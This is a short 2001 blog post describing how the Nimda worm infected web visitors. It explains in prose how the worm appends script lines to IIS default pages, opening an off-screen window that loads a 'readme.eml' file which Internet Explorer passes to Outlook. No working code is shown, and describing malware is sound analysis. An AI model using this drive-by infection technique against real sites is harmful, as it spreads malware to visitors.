Slug: nimda-web-page-exploit-details Date: 2001-09-20 Title: Nimda web page exploit details layout: post

Ok, I found an infected site. (I notified the webmaster, who was already aware of the situation. The site is now down.) Anyway, here's the skinny:<p>

Nimda presumably uses IIS's ability to add footers to HTML documents. Once it infects a server running IIS, it appears to add two new lines to the default document ("/", default.[asp,htm]), after the original <html>…</html> element. Each line is another <html> tag, containing a single <script tag. The tag opens a new window at coordinates 6000,6000 (way off the screen). The "src" attribute points to the virus file, "readme.eml". If IE is reading the page, it will probably try to open the .eml file (a saved email from Outlook) in the default viewer - Outlook. Doing so will run the virus, and the host will now be infected. Naaaaaasty.</p>